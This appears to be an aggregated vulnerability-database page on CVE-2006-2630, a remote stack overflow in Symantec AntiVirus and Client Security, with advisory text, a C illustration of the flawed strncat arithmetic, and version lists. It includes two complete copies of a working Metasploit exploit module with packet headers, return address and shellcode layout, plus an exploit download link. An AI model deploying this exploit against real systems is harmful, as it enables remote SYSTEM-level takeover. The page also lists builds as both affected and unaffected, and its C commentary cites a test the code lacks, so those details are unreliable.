CVE-2006-2630
CVSS 10.0
Published: 2006-05-27 17:02:00
Modified: 2011-03-07 21:36:36

[Original] Stack-based buffer overflow in Symantec Antivirus 10.1 and Client Security 3.1 allows remote attackers to execute arbitrary code via unknown attack vectors.


[CNNVD] Symantec Antivirus Remote Management Interface Stack Overflow Vulnerability (CNNVD-200605-498)

        Symantec AntiVirus is a widely deployed antivirus solution.
        A remote stack overflow vulnerability exists in the Symantec AntiVirus remote management interface. The remote management protocol used by the affected products is a proprietary message-based protocol with two levels of encapsulation. The outer layer consists of a message header, which may be message type 10, indicating a request for Rtvscan.exe, or type 20 or 30, indicating a forwarded SSL negotiation. If SSL is established for the TCP connection, subsequent communication is encrypted, although parts of the proprietary format remain in plaintext.
        The data of a type 10 message contains its own header and message body, both of which are processed by Rtvscan.exe. This header contains a command field that specifies the operation to perform and the format of the message body data.
        The COM_FORWARD_LOG (0x24) command handler uses strncat incorrectly, allowing a 0x180-byte stack buffer to be overwritten with arbitrary data. If the first string in a COM_FORWARD_LOG request contains a backslash, one of the following two strncat calls is executed:
        * If the string contains a comma but no double quote:
        strncat(dest, src, 0x17A - strlen(src));
        * Otherwise:
        strncat(dest, src, 0x17C - strlen(src));
        If the length of the source string exceeds 0x17A or 0x17C characters respectively, the subtraction underflows, producing a very large copy size. This allows the source string to be appended to the buffer, overwriting the stack with up to 64KB of data (any bytes except null).
        Rtvscan.exe is compiled with the Visual Studio /GS security option and includes stack canary checks, but an attacker can bypass this protection through the very large overwrite and control of the exception handler registration.
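The C program below is an added illustration, not code from this page, from Symantec or from eEye. It reproduces the size arithmetic of the two strncat calls quoted above to show how the size_t subtraction wraps once strlen(src) exceeds the constant, and contrasts it with an append whose bound is derived from the destination's remaining space rather than from the source length. The buffer size 0x180 and the constants 0x17A and 0x17C come from the description; the function names and the constructed 'A'-filled inputs are assumptions made here, and the copy is never performed with the wrapped bound.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Geometry taken from the advisory text: a 0x180-byte stack buffer and the
   two constants the COM_FORWARD_LOG handler subtracts strlen(src) from. */
#define DEST_SIZE   0x180
#define BOUND_COMMA 0x17A   /* string contains a comma but no double quote */
#define BOUND_OTHER 0x17C   /* every other case */

/* Fills buf with 'A' and NUL-terminates it; used to build test inputs
   (constructed data, not captured traffic). Returns buf. */
char *fill_a(char *buf, size_t size) {
    memset(buf, 'A', size - 1);
    buf[size - 1] = '\0';
    return buf;
}

/* Reproduces the handler's size arithmetic without performing any copy.
   size_t is unsigned: once strlen(src) exceeds the constant, the subtraction
   wraps around to a value near SIZE_MAX instead of becoming negative. */
size_t vulnerable_bound(const char *src, bool comma_no_quote) {
    size_t limit = comma_no_quote ? BOUND_COMMA : BOUND_OTHER;
    return limit - strlen(src);
}

/* True when the bound the handler would hand to strncat is larger than the
   whole destination buffer, i.e. the call could write past 0x180 bytes. */
bool bound_exceeds_buffer(const char *src, bool comma_no_quote) {
    return vulnerable_bound(src, comma_no_quote) > DEST_SIZE;
}

/* Hardened append. The bound is computed from the destination's remaining
   space (never from strlen(src)), and an input that does not fit is
   rejected rather than silently truncated. Returns 0 on success, -1 if
   dest is not NUL-terminated within dest_size or src does not fit. */
int safe_append(char *dest, size_t dest_size, const char *src) {
    const char *nul = memchr(dest, '\0', dest_size);
    if (nul == NULL) return -1;
    size_t used = (size_t)(nul - dest);
    size_t room = dest_size - used - 1;      /* keep one byte for the NUL */
    size_t need = strlen(src);
    if (need > room) return -1;
    memcpy(dest + used, src, need + 1);      /* copies src and its NUL */
    return 0;
}

int main(void) {
    char short_src[0x100], long_src[0x200];
    fill_a(short_src, sizeof short_src);     /* 255 bytes: below both bounds */
    fill_a(long_src, sizeof long_src);       /* 511 bytes: above both bounds */

    printf("short: bound=%zu exceeds_buffer=%d\n",
           vulnerable_bound(short_src, false), bound_exceeds_buffer(short_src, false));
    printf("long:  bound=%zu exceeds_buffer=%d\n",
           vulnerable_bound(long_src, false), bound_exceeds_buffer(long_src, false));

    char dest[DEST_SIZE] = "log: ";
    printf("safe_append(short) -> %d\n", safe_append(dest, sizeof dest, short_src));
    printf("safe_append(long)  -> %d\n", safe_append(dest, sizeof dest, long_src));
    return 0;
}
```

Note that even without the wrap, a bound of the form constant minus strlen(src) is the wrong quantity: the third argument of strncat must be the space left in dest after its current contents and terminator, which depends on strlen(dest), not on the source. The second short append in the test fails for exactly that reason, because the buffer is already mostly full.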
        
        

- CVSS (Base Score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: NETWORK [the attacker needs neither intranet nor local access]
Authentication: NONE [no authentication required to exploit]

- CPE (Affected Platforms and Products)

cpe:/a:symantec:norton_antivirus:10.0::corporate
cpe:/a:symantec:client_security:3.0.2.2020  Symantec Client Security 3.0.2.2020
cpe:/a:symantec:norton_antivirus:10.1::corporate
cpe:/a:symantec:norton_antivirus:10.0.2.2010::corporate
cpe:/a:symantec:norton_antivirus:10.1.400::corporate
cpe:/a:symantec:client_security:3.1.400  Symantec Client Security 3.1.400
cpe:/a:symantec:norton_antivirus:10.0.2.2020::corporate
cpe:/a:symantec:client_security:3.1
cpe:/a:symantec:client_security:3.0.2.2010  Symantec Client Security 3.0.2.2010
cpe:/a:symantec:client_security:3.0  Symantec Client Security 3.0
cpe:/a:symantec:norton_antivirus:10.0.2.2021::corporate
cpe:/a:symantec:client_security:3.1.394  Symantec Client Security 3.1.394

- OVAL (Technical Details for Detection)

No matching OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2630
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2630
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-498
(Official data source) CNNVD

- Other Links and Resources

http://www.kb.cert.org/vuls/id/404910
(PATCH)  CERT-VN  VU#404910
http://www.securityfocus.com/bid/18107
(PATCH)  BID  18107
http://securitytracker.com/id?1016162
(PATCH)  SECTRACK  1016162
http://securitytracker.com/id?1016161
(PATCH)  SECTRACK  1016161
http://securityresponse.symantec.com/avcenter/security/Content/2006.05.25.html
(VENDOR_ADVISORY)  CONFIRM  http://securityresponse.symantec.com/avcenter/security/Content/2006.05.25.html
http://secunia.com/advisories/20318
(VENDOR_ADVISORY)  SECUNIA  20318
http://www.vupen.com/english/advisories/2006/2005
(UNKNOWN)  VUPEN  ADV-2006-2005
http://www.securityfocus.com/archive/1/archive/1/435200/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060527 Symantec antivirus software exposes computers
http://www.eeye.com/html/research/upcoming/20060524.html
(UNKNOWN)  EEYE  EEYEB-20060524
http://xforce.iss.net/xforce/xfdb/26706
(UNKNOWN)  XF  symantec-antivirus-client-bo(26706)
http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/046355.html
(UNKNOWN)  FULLDISC  20060526 new symantec vuln

- Vulnerability Information

Symantec Antivirus Remote Management Interface Stack Overflow Vulnerability
Critical  Buffer overflow
2006-05-27 00:00:00 2007-02-08 00:00:00
Remote / Local

- Advisories and Patches

        The vendor has released an update that fixes this issue; patch download link:
        http://www.symantec.com/techsupp/enterprise/select_product_updates.html

- Vulnerability Information (16830)

Symantec Remote Management Buffer Overflow (EDBID:16830)
windows remote
2010-05-09 Verified
0 metasploit
N/A [Download]
##
# $Id: symantec_rtvscan.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Symantec Remote Management Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Symantec Client Security 3.0.x.
				This module has only been tested against Symantec Client Security 3.0.2
				build 10.0.2.2000.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					['CVE', '2006-2630'],
					['OSVDB', '25846'],
					['BID', '18107'],
					['URL', 'http://research.eeye.com/html/advisories/published/AD20060612.html'],
				],
			'Privileged'     => true,

			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'SCS 3.0.2 build 10.0.2.2000', { 'Ret' => 0x69985624 } ], # Dec2TAR.dll
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'May 24 2006'))

		register_options(
			[
				Opt::RPORT(2967)
			], self.class)
	end

	def exploit
		connect

		header =  "\x01\x10\x0a\x20\x0a\x00\x00\x00"
		header << "\x02\x18\x00\x01\x00\x00\x00\x00"
		header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
		header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"

		crufta =  rand_text_alphanumeric(512)
		cruftb =  rand_text_alphanumeric(514)
		cruftc =  payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)
		cruftd =  rand_text_alphanumeric(495)

		cruftd[479, 2] = "\xeb\x06"
		cruftd[483, 4] = [target.ret].pack('V')
		cruftd[487, 5] = [0xe8, -1000].pack('CV')

		cruftd << rand_text_alphanumeric(21)
		crufte =  rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
		crufte << rand_text_alphanumeric(504) + "\x00\x00"

		overflow =  [ crufta.length ].pack('v') + crufta
		overflow << [ cruftb.length ].pack('v') + cruftb
		overflow << [ cruftc.length ].pack('v') + cruftc
		overflow << [ cruftd.length ].pack('v') + cruftd
		overflow << [ crufte.length ].pack('v') + crufte

		sploit = header + overflow

		print_status("Trying target #{target.name}...")
		sock.put(sploit)

		handler
		disconnect
	end

end
		

- Vulnerability Information (F83223)

Symantec Remote Management Buffer Overflow (PacketStormID:F83223)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2006-2630
[Download]

This Metasploit module exploits a stack overflow in Symantec Client Security 3.0.x. This Metasploit module has only been tested against Symantec Client Security 3.0.2 build 10.0.2.2000.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'Symantec Remote Management Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in Symantec Client Security 3.0.x.
				This module has only been tested against Symantec Client Security 3.0.2
				build 10.0.2.2000.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					['CVE', '2006-2630'],
					['OSVDB', '25846'],
					['BID', '18107'],
					['URL', 'http://research.eeye.com/html/advisories/published/AD20060612.html'],
				],
			'Privileged'     => true,
                        
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},

			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
				},
			'Platform'       => 'win',
			'Targets'        => 
				[
					[ 'SCS 3.0.2 build 10.0.2.2000', { 'Ret' => 0x69985624 } ], # Dec2TAR.dll
				],

			'DefaultTarget' => 0,

			'DisclosureDate' => 'May 24 2006'))
			
		register_options( [ Opt::RPORT(2967) ], self.class )
	end

	def exploit
		connect
		
		header =  "\x01\x10\x0a\x20\x0a\x00\x00\x00"
		header << "\x02\x18\x00\x01\x00\x00\x00\x00"
		header << "\x00\x24\x00\x14\xb7\xc9\xd2\xd9"
		header << "\x3e\x33\xef\x34\x25\x1f\x43\x00"

		crufta =  rand_text_alphanumeric(512)
		cruftb =  rand_text_alphanumeric(514)
		cruftc =  payload.encoded + rand_text_alphanumeric(513 - payload.encoded.length)
		cruftd =  rand_text_alphanumeric(495)
		
		cruftd[479, 2] = "\xeb\x06"
		cruftd[483, 4] = [target.ret].pack('V')
		cruftd[487, 5] = [0xe8, -1000].pack('CV')
		
		cruftd << rand_text_alphanumeric(21)
		crufte =  rand_text_alphanumeric(6) + "\x19\x00\x00\x00"
		crufte << rand_text_alphanumeric(504) + "\x00\x00"

		overflow =  [ crufta.length ].pack('v') + crufta
		overflow << [ cruftb.length ].pack('v') + cruftb
		overflow << [ cruftc.length ].pack('v') + cruftc
		overflow << [ cruftd.length ].pack('v') + cruftd 
		overflow << [ crufte.length ].pack('v') + crufte

		sploit = header + overflow

		print_status("Trying target #{target.name}...")
		sock.put(sploit)
		
		handler
		disconnect
	end

end
    

- Vulnerability Information

25846
Symantec Client Security / AntiVirus Management Interface Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified, Coordinated Disclosure

- Vulnerability Description

A buffer overflow exists in the Client Security and AntiVirus products. The Remote Management interface fails to validate input to the COM_FORWARD_LOG command handler, resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution, resulting in a loss of integrity.

- Timeline

2006-05-24 Unknown
Unknown 2006-06-12

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Symantec has released a patch to address this vulnerability.

- References

- Vulnerability Author

- Vulnerability Information

Symantec AntiVirus Remote Stack Buffer Overflow Vulnerability
Boundary Condition Error 18107
Yes Yes
2006-05-24 12:00:00 2007-11-01 04:26:00
Derek Soeder is credited with the discovery of this vulnerability.

- Affected Versions

Symantec Client Security 3.1 .400
Symantec Client Security 3.1 .394
Symantec Client Security 3.0.2 .2020
Symantec Client Security 3.0.2 .2010
Symantec Client Security 3.0.2 .2001
Symantec Client Security 3.0.2 .2000
Symantec Client Security 3.0
Symantec Client Security 3.1
Symantec AntiVirus Corporate Edition 10.1 .400
Symantec AntiVirus Corporate Edition 10.1 .394
Symantec AntiVirus Corporate Edition 10.0.2 .2020
Symantec AntiVirus Corporate Edition 10.0.2 .2010
Symantec AntiVirus Corporate Edition 10.0.2 .2001
Symantec AntiVirus Corporate Edition 10.0.2 .2000
Symantec AntiVirus Corporate Edition 10.0
Symantec AntiVirus Corporate Edition 10.1
Symantec Client Security 3.1 .401
Symantec Client Security 3.1 .396
Symantec Client Security 3.0.2 .2021
Symantec Client Security 3.0.2 .2011
Symantec Client Security 3.0.2 .2002
Symantec Client Security 2.0.3 MR3 b9.0.3.1000
Symantec Client Security 2.0.2 MR2 b9.0.2.1000
Symantec Client Security 2.0.1 MR1 b9.0.1.1000
Symantec Client Security 2.0 STM build 9.0.0.338
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0
Symantec Client Security 1.1.1 MR5 build 8.1.1.336
Symantec Client Security 1.1.1 MR4 build 8.1.1.329
Symantec Client Security 1.1.1 MR3 build 8.1.1.323
Symantec Client Security 1.1.1 MR2 build 8.1.1.319
Symantec Client Security 1.1.1 MR1 build 8.1.1.314a
Symantec Client Security 1.1.1 MR6 b8.1.1.266
Symantec Client Security 1.1.1
Symantec Client Security 1.1 STM b8.1.0.825a
Symantec Client Security 1.1
Symantec Client Security 1.0.1 MR8 build 8.01.471
Symantec Client Security 1.0.1 MR7 build 8.01.464
Symantec Client Security 1.0.1 MR6 build 8.01.460
Symantec Client Security 1.0.1 MR5 build 8.01.457
Symantec Client Security 1.0.1 MR4 build 8.01.446
Symantec Client Security 1.0.1 MR3 build 8.01.434
Symantec Client Security 1.0.1 build 8.01.437
Symantec Client Security 1.0.1 MR9 b8.01.501
Symantec Client Security 1.0.1 MR2 b8.01.429c
Symantec Client Security 1.0.1 MR1 b8.01.425a/b
Symantec Client Security 1.0.1
Symantec Client Security 1.0 .0 b8.01.9378
Symantec Client Security 1.0 b8.01.9374
Symantec Client Security 1.0
Symantec AntiVirus Corporate Edition 10.1 .401
Symantec AntiVirus Corporate Edition 10.1 .396
Symantec AntiVirus Corporate Edition 10.0.2 .2021
Symantec AntiVirus Corporate Edition 10.0.2 .2011
Symantec AntiVirus Corporate Edition 10.0.2 .2002
Symantec AntiVirus Corporate Edition 9.0.4
Symantec AntiVirus Corporate Edition 9.0.3 .1000
Symantec AntiVirus Corporate Edition 9.0.2 .1000
Symantec AntiVirus Corporate Edition 9.0.1 .1.1000
Symantec AntiVirus Corporate Edition 9.0 .0.338
Symantec AntiVirus Corporate Edition 9.0
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.329
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.323
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.319
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.314a
Symantec AntiVirus Corporate Edition 8.1.1 .377
Symantec AntiVirus Corporate Edition 8.1.1 .366
Symantec AntiVirus Corporate Edition 8.1.1
Symantec AntiVirus Corporate Edition 8.1 build 8.01.471
Symantec AntiVirus Corporate Edition 8.1 build 8.01.464
Symantec AntiVirus Corporate Edition 8.1 build 8.01.460
Symantec AntiVirus Corporate Edition 8.1 build 8.01.457
Symantec AntiVirus Corporate Edition 8.1 build 8.01.446
Symantec AntiVirus Corporate Edition 8.1 build 8.01.437
Symantec AntiVirus Corporate Edition 8.1 build 8.01.434
Symantec AntiVirus Corporate Edition 8.1 .0.825a
Symantec AntiVirus Corporate Edition 8.1
Symantec AntiVirus Corporate Edition 8.0 1.9378
Symantec AntiVirus Corporate Edition 8.0 1.9374
Symantec AntiVirus Corporate Edition 8.0 1.501
Symantec AntiVirus Corporate Edition 8.0 1.429c
Symantec AntiVirus Corporate Edition 8.0 1.425a/b
Symantec AntiVirus Corporate Edition 8.0 1
Symantec AntiVirus Corporate Edition 8.0

- Unaffected Versions

Symantec Client Security 3.1 .401
Symantec Client Security 3.1 .396
Symantec Client Security 3.0.2 .2021
Symantec Client Security 3.0.2 .2011
Symantec Client Security 3.0.2 .2002
Symantec Client Security 2.0.3 MR3 b9.0.3.1000
Symantec Client Security 2.0.2 MR2 b9.0.2.1000
Symantec Client Security 2.0.1 MR1 b9.0.1.1000
Symantec Client Security 2.0 STM build 9.0.0.338
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0 (SCF 7.1)
Symantec Client Security 2.0
Symantec Client Security 1.1.1 MR5 build 8.1.1.336
Symantec Client Security 1.1.1 MR4 build 8.1.1.329
Symantec Client Security 1.1.1 MR3 build 8.1.1.323
Symantec Client Security 1.1.1 MR2 build 8.1.1.319
Symantec Client Security 1.1.1 MR1 build 8.1.1.314a
Symantec Client Security 1.1.1 MR6 b8.1.1.266
Symantec Client Security 1.1.1
Symantec Client Security 1.1 STM b8.1.0.825a
Symantec Client Security 1.1
Symantec Client Security 1.0.1 MR8 build 8.01.471
Symantec Client Security 1.0.1 MR7 build 8.01.464
Symantec Client Security 1.0.1 MR6 build 8.01.460
Symantec Client Security 1.0.1 MR5 build 8.01.457
Symantec Client Security 1.0.1 MR4 build 8.01.446
Symantec Client Security 1.0.1 MR3 build 8.01.434
Symantec Client Security 1.0.1 build 8.01.437
Symantec Client Security 1.0.1 MR9 b8.01.501
Symantec Client Security 1.0.1 MR2 b8.01.429c
Symantec Client Security 1.0.1 MR1 b8.01.425a/b
Symantec Client Security 1.0.1
Symantec Client Security 1.0 .0 b8.01.9378
Symantec Client Security 1.0 b8.01.9374
Symantec Client Security 1.0
Symantec AntiVirus Corporate Edition 10.1 .401
Symantec AntiVirus Corporate Edition 10.1 .396
Symantec AntiVirus Corporate Edition 10.0.2 .2021
Symantec AntiVirus Corporate Edition 10.0.2 .2011
Symantec AntiVirus Corporate Edition 10.0.2 .2002
Symantec AntiVirus Corporate Edition 9.0.4
Symantec AntiVirus Corporate Edition 9.0.3 .1000
Symantec AntiVirus Corporate Edition 9.0.2 .1000
Symantec AntiVirus Corporate Edition 9.0.1 .1.1000
Symantec AntiVirus Corporate Edition 9.0 .0.338
Symantec AntiVirus Corporate Edition 9.0
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.329
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.323
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.319
Symantec AntiVirus Corporate Edition 8.1.1 build 8.1.1.314a
Symantec AntiVirus Corporate Edition 8.1.1 .377
Symantec AntiVirus Corporate Edition 8.1.1 .366
Symantec AntiVirus Corporate Edition 8.1.1
Symantec AntiVirus Corporate Edition 8.1 build 8.01.471
Symantec AntiVirus Corporate Edition 8.1 build 8.01.464
Symantec AntiVirus Corporate Edition 8.1 build 8.01.460
Symantec AntiVirus Corporate Edition 8.1 build 8.01.457
Symantec AntiVirus Corporate Edition 8.1 build 8.01.446
Symantec AntiVirus Corporate Edition 8.1 build 8.01.437
Symantec AntiVirus Corporate Edition 8.1 build 8.01.434
Symantec AntiVirus Corporate Edition 8.1 .0.825a
Symantec AntiVirus Corporate Edition 8.1
Symantec AntiVirus Corporate Edition 8.0 1.9378
Symantec AntiVirus Corporate Edition 8.0 1.9374
Symantec AntiVirus Corporate Edition 8.0 1.501
Symantec AntiVirus Corporate Edition 8.0 1.429c
Symantec AntiVirus Corporate Edition 8.0 1.425a/b
Symantec AntiVirus Corporate Edition 8.0 1
Symantec AntiVirus Corporate Edition 8.0

- Vulnerability Discussion

Multiple Symantec products are prone to a remote stack buffer-overflow vulnerability.

This issue allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges, facilitating the complete compromise of affected computers.

Symantec AntiVirus Corporate Edition 10.1 and Symantec Client Security 3.1 are currently known to be vulnerable to this issue. All supported platforms are affected including Microsoft Windows and Novell Netware.

- Exploitation

Reports indicate that the worms 'W32.Spybot.ACYR' and 'W32.Spybot.AMTE' may be exploiting this issue in the wild.

An exploit is available to members of the Immunity Partner's program:

https://www.immunityinc.com/downloads/immpartners/symantec_rm.tar

This issue is actively being exploited in the wild by 'W32.Sagevo'. A recent spike of exploit activity is also reported.

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

- Solution

Symantec has released an advisory with more information regarding this issue.

Fixes for all supported platforms, including Microsoft Windows and Novell NetWare, are available from the following URI:

http://www.symantec.com/techsupp/enterprise/select_product_updates.html

Fixes for localized versions are available from the following URI:

http://service1.symantec.com/SUPPORT/ent-security.nsf/docid/2006052609181248

NOTE: Given the recent spike in exploit activity in the wild by 'W32.Sagevo', customers running vulnerable versions of the affected software should install fixes as soon as possible.


Symantec AntiVirus Corporate Edition 10.0.2 .2001
Symantec AntiVirus Corporate Edition 10.0.2 .2020
Symantec AntiVirus Corporate Edition 10.0.2 .2000
Symantec AntiVirus Corporate Edition 10.1 .394
Symantec AntiVirus Corporate Edition 10.1 .400

- References

 

 
